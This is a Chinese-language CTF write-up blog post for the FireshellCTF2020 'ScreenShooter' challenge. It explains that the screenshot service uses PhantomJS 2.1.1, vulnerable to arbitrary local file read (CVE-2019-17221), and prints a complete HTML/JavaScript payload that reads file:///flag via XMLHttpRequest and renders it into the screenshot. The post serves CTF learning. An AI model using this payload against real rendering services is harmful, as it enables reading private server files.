Loading

BUUFTC-日刷-[FireshellCTF2020]ScreenShooter-PhantomJS文件读取漏洞

一个输入框,输入后会返回一个图片是截图

 

 但是大概率是爬虫爬取前端代码

在vps监听一下80端口

观察请求发现用的是PhantomJS

而查询可知,PhantomJS 2.1.1是有任意文件读取漏洞的,CVE-2019-17221

payload

<!DOCTYPE html>
<html>
<head>
<title>Anionck</title>
</head>
<body>
<script>
flag=new XMLHttpRequest;
flag.onload=function(){
    document.write(this.responseText)
};
flag.open("GET","file:///flag");
flag.send();
</script>
</body>
</html>

在vps部署,让题目访问即可

当然它是以图片返回的,识别一下即可

 

posted @ 2021-12-01 18:01  Aninock  阅读(89)  评论(0编辑  收藏  举报